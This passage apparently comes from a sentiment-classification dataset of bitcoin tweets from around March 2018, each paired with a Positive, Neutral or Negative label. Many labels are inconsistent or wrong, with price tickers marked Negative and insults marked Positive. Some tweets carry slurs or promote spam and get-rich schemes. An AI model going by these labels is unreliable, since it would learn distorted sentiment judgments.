basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "[05:11] #utrecht #Follow us for more #free #Bitcoin #information.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.71%, ($-5767.99) [Currently $8402.015] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8459.92", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kiddiebeatz @itzhel_s everyone follow @MyBit_DApp. The next bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This is the perfect time to go long $BCD large. Go #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@leket11 @XPCBogdansky @adamludwin Why couldn\u2019t women have created bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "follow @MyBit_DApp. The next bitcoin.@marcelluswiley. Love your radio show since 2013 big homie.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Will be posting a $BTC #Bitcoin TA that I'm hoping will ease your worries.\n\nJust gimme a second.\n\n#Cryptocurrency \n#Blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kl_arnoldas Bitcoin always recovers, patience is required", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MrToxicCodes ?sooooo....its bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I should have sold that bitcoin yday \ud83d\ude29", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9478.60 --- Includes Sum of Forks, Core $8449.00 (89.14%) + Cash $972.50 (10.26%) + Gold $57.10 (0.60%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@josephkunzler Are you talking about bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8460.38.\nThe current price of BCash is $974.346, or 0.11559 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u2018I Don\u2019t Think Bitcoin Will Last Forever\u2019: NSA Whistleblower Edward Snowden #BitcoinNews #btc #ico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@roysebag @mene Yes I'll probably do it... But I would had like to see rings and pendants with Bitcoin symbol!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Sicarious_ An altcoin can not share the genesis block and be SHA256. If it does then it\u2019s an attempted bitcoin fork not an alt coin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mamawhale you can always pay in PBR. fuck Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The leading cause of heart attacks in 2018.. 
#Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "14R382XrivAGwDgZkoFDMPq7dw7yFuAcBh\n\n@georgesoros send me bitcoin and i will vote for dnc", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8474.51 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$974,346\n1 Hour: 0.40 % | 24 Hours: -7.47 % | 7 Days: 5.42 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#moneto This is a great project a specialized platform to provide loans in a fiatmoney on the security of Bitcoin. #crypto #blockchain #eth", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is ugly.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "FINANCIAL INDICATORS:\n\n$ trading at R11.8465\n\n\u00a3 trading at R16.7185\n\n\u20ac trading at R14.6108\n\nA Bitcoin costs R103420.00\n\nBrent Crude $68.91", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8493.01 / 6893.351\u20ac\n1 bitcoin-cash = $974.983 / 791.344\u20ac\n1 ethereum = $522.317 / 423.938\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@dahirdidit Pretty sure the arc already takes bitcoin :/", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@LukeDashjr @CobraBitcoin BTG is basically exactly what you\u2019re proposing. 
A fork from bitcoin to change the mining algorithm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@neontaster No, it\u2019s like gold. Nations had borders back when gold was the world reserve currency. They can do the same with Bitcoin now.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin #ICO #Bounty #airdrop #gambling #mining #crypto #trading #ethereum #dogecoin #litecoin #altcoin Just #FollowMe and i will #FollowBa", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@217zombie101 @CryptoCoinNewz Bitcoin 2.0", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "my future wife jus gave a dude a dry hand job at the thought of bitcoin plummeting meanwhile I'm out this bitch...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MagUra_Crypto @officialmcafee @wolfofwallst A scammer saying no future for bitcoin? Sounds legit.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Okay bitcoin broker. You a tough guy.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MKBHD I can creat for you just any website category you want for $100. 
I'll accept #bitcoin #ethereum and #PayPal.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Time to discuss Bitcoin Hardware", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sha256 was rated as the most secure crypto algorithms. #Bitcoin uses that. It\u2019s proven to be impenetrable and most secure crypto #cryptocon", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nguyen_richy @BITCOlNCASH the 51\u2105 attack is only for double spending. Learn some bitcoin basics. Rules are imposed by the nodes.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "bitcoin better fucking go up rn lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic selloff below 795", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic selloff below 795", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What the heck is a bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SSethSL You gay if you use bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@derose @DavidFBailey @WayneVaughan @VinnyLingham @gyft Not only that, its very complex building apps on bitcoin...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@koinexindia $NANO will shake the world upside down. It is the next BIGGEST thing after Bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Id go back and invest in apple and amazon and bitcoin. 
Delta too.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8498.22\nEthereum:$522.921\nBitcoin Cash:$977.619\nLitecoin:$159.751\nRipple:$0.642295\nIOTA:$1.28287", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8429.98@bitstamp. High $9046.180. Low $8342.000. Market Cap $142.755 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8498.22 / 6897.58\u20ac\n1 bitcoin-cash = $976.701 / 792.739\u20ac\n1 ethereum = $522.51 / 424.095\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8498.22 / 6897.58\u20ac\n1 bitcoin-cash = $976.701 / 792.739\u20ac\n1 ethereum = $522.51 / 424.095\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CalvinAyre Meal was paid for using bitcoin cash.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00079152 (+0.00000808) #BTC / 6.68708 (+0.11217) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003324 (+0.00000008) #BTC / 0.280737 (+0.00243) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002279 (+0.00000029) #BTC / 0.192533 (+0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0481625 (-0.00009450) #BTC / 406.897 (+1.90500) #USD. Market rank is 11. 
#dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004623 (+0.00000029) #BTC / 0.390468 (+0.00491) #USD. Market rank is 115. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_adampagano_ U gay if you don\u2019t buy drugs online with bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8498.22 as of Thu Mar 22 23:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8452.6", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 05:31:49 2018 (37:20)\nUSD : 8437.36\nWght: 0.42\nBlk#: 514762\nSize: 1103.1 KB\nTXs: 2741\nPool: 1234 (0.6 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aelfblockchain maybe new bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CalvinAyre That\u2019s why I own bitcoin cash. These little kids disliking it validates it", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@andreuswolf Anything regarding bitcoin is like opening Pandora's Box.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CeliaPacquola just seen your article in @theage lets talk #bitcoin !!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is consensual.\n\nFiat is force.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "First #FF @EichenYogeswari @DailyMail @MileySmilerNews @Bitcoin @NiGHTS_official @SarahRyanHudson @BrandiKHOU @lorde @HannaZellers", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Stop the bcash propaganda!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JacaNews Why not have a whole different Crypto segment instead of including just Bitcoin as single cryptocurrency ?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The end game is a life in the photo of the city in my twitter header. 
#cryptolife #Cryptocurrency #FinancialFreedom #Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alminibach Are u saying that investing all ur life savings in bitcoin is a bad idea?!?!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Get FUDcked #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SSethSL Do a lot of drug dealers accept bitcoin these days", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin \"once you get in, you cant get enough. It's like digital crack\" #bitcointrading #bitcoinschool #whatisbitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. test 2 : @slidecoin , spam or legit", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My twitter header is the end game #lifegoals #cryptolife #Cryptocurrency #Bitcoin #FinancialFreedom", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Poll #Crypto #bitcoin #ltc #litecoin \n\nHow often do you check how your coins are doing?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8475.55 / 6879.18\u20ac\n1 bitcoin-cash = $975.635 / 791.874\u20ac\n1 ethereum = $521.277 / 423.094\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aelfblockchain Blockchain is the tech. Bitcoin is merely the first mainstream manifestation of its potential.\u201d - Marc Kenigsberg", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aelfblockchain Bitcoin is unstoppable.\u201d - Roger Ver aka \u201cBitcoin Jesus\u201d Voluntaryist", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.37%, ($-5720.01) [Currently $8449.995] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin is like the better technology in a backup role waiting for the primary to fail\ud83d\udd25", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 05:42:31 2018 (10:42)\nUSD : 8429.77\nWght: 0.42\nBlk#: 514763\nSize: 1050.2 KB\nTXs: 2243\nPool: 14 (0.1 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Altcoinbuzzio Currently Bitcoin, Ethereum, and Litecoin in my opinion", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000003b8101bed05b189c7d6522a0da5e0add0eb5c562e27838 mined at height 514763.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@derekmagill @ryanxcharles @YoursOrg @Satoshis_Vision Bitcoin Cash #1", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I wonder if the #POTUS has #bitcoin, looks like #tariffs could make #Crypto ... great again\ud83d\udd25", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Ads suck. 
Let's use Bitcoin Cash instead.\" - @ryanxcharles @YoursOrg at @Satoshis_Vision", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Yorkyor30444439 Bitcoin with the fork-athon of 2017 during the last trimester was a perfect example of this.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto why always assume parallel with bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@martin_kj @TeaPainUSA @materia1wor1d @GeeJustG Yeah - Bitcoin, drugs - maybe they finally nailed \"Satoshi Nakamoto\".", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "morning \nbitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8425 / \u20ac6830 / \u00a35967 @ Block 514762. \nMarket Cap: 143.22B USD. #Bitcoin #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@alexfarncomb @tabcomau Money? I thought you'd be using your Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SilviuMajor @Lowmehlee What\u2019s that in bitcoin 2gen", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ".@elonmusk I was there since the early days (6M followers). 
where is my Bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Why Bitcoin Cash? It works today and it has the best chance to keep working tomorrow.\" - @ryanxcharles @YoursOrg @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8474.65 / 6878.449\u20ac\n1 bitcoin-cash = $975.691 / 791.919\u20ac\n1 ethereum = $521.114 / 422.962\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Hunting_Rabbits If there was consensus, would the Bitcoin community have split into different factions?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin needs some whale action, or we we\u2019ll be seeing some new lows shortly!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8406.73", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Do you guys realise that we are part of a revolution called cryptocurency? 
#JACKMAtE #Bitcoin #CryptoCurrency #Altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Most underappreciated characterisric of Bitcoin:\n\n1) Anonymous Founder\n2) Limited Supply", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Jay and Dan highlights from episode 126 on SC:\n\nPhotos of an announcer\nHey Jack\nBark in the park night\nBitcoin investing\n\n#JayandDan", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Every friday is bitcoin day", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Crym89s @veIvetines Yeap and buying bitcoin at .006 cents", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +766.32%, (+$7453.27) [Currently $8425.875] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 05:56:25 2018 (13:54)\nUSD : 8420.81\nWght: 0.42\nBlk#: 514764\nSize: 839.2 KB\nTXs: 1398\nPool: 97 (0.1 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000004cdb6d6e08435c5fbb306130c6af2b50ce9815ae2e6f1d mined at height 514764.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kevincosandey Do you accept bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"The way to make Bitcoin Cash mainstream is to make it easy for anyone to earn Bitcoin Cash.\" @ryanxcharles @YoursOrg @Satoshis_Vision", 
"output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Dutch Court Finds Bitcoin A Legitimate \u201cTransferable Value\u201d...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30397.35997000 | BITCOIN(BLCHAIN) R$27928.02 | LITECOIN(MCDTBC) R$575.99995000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 BTC is \n INR 548,843 or\n USD 8,421 or\n GBP 5,964 or\n EUR 6,827\n\n #Bitcoin #BitcoinPrice", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This just in: Bitcoin is rising!\nCurrent Rate: 8419.37 USD = 1 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 10:00PM #Bitcoin Price:\nUSD 8657.47 | EUR 7029.56 | JPY 921267.14", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,460.33, market cap of $143,271,559,909 (44.33%), and 24 hr vol. 
of $5,515,150,000 (37.68%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,460.33\nChange in 1h: +0.14%\nMarket cap: $143,271,559,909.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8460.33\nEthereum:$520.325\nBitcoin Cash:$973.61\nLitecoin:$159.12\nRipple:$0.637725\nIOTA:$1.27707", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.29% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,419.37, EUR 6,824.96", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.41 / 6859.586\u20ac\n1 bitcoin-cash = $972.688 / 789.482\u20ac\n1 ethereum = $518.784 / 421.071\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Women don't want a nigga buying them flowers anymore. 
They want shit like bitcoin or just give them money.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8451.41 / 6859.586\u20ac\n1 bitcoin-cash = $972.688 / 789.482\u20ac\n1 ethereum = $518.784 / 421.071\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin 24Hour High/Low:\nHigh: $9,402.26\nLow: $8,878.77", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "You can't kill Bitcoin\n\n-@APompliano", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8411.04/$8418.50 #Bitstamp\n$8402.15/$8412.18 #Kraken\n\u21e2$-16.35/$1.14\n$8369.99/$8455.38 #Coinbase\n\u21e2$-48.51/$44.34", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$29.4M; Support til $8200:$38.7M $BTC $BTCUSD #bitcoin #orderbook #crypto #finance", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.05 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078324 (-0.00000828) #BTC / 6.59819 (-0.08889) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004597 (-0.00000026) #BTC / 0.386025 (-0.00444) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0476288 (-0.00053370) #BTC / 399.923 (-6.97400) #USD. Market rank is 12. 
#dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8430.99 | +0.0015%\ud83d\udcc8\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002272 (-0.00000007) #BTC / 0.190783 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003306 (-0.00000018) #BTC / 0.277553 (-0.00318) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sshhh dont tell anyone but #Bitcoin is $8412.05 right now. Ok back to sleep zzzzz", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DavidDagan @CherylPreheim @deray @11AliveNews No! The incredibly specific amount of $51k in bitcoin please and thank you.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,417.21 v #BitcoinCash $971.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 14:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\ud83d\udce3 Bitcoin is $8412.06 $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "8412.06$ for #bitcoin now", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Next Bitcoin is The Champcoin (TCC)\nIndia's First & No1 CryptoCurrency...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8412.06 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8412.06", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mindstatex @SheriUcar #Bitcoin(BCH) is the KING of 
the Crypto Currencies.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8412.06 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@allcharmngrace @clairlemon @MarkYusko @iammarkcarnegie How do you short bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", 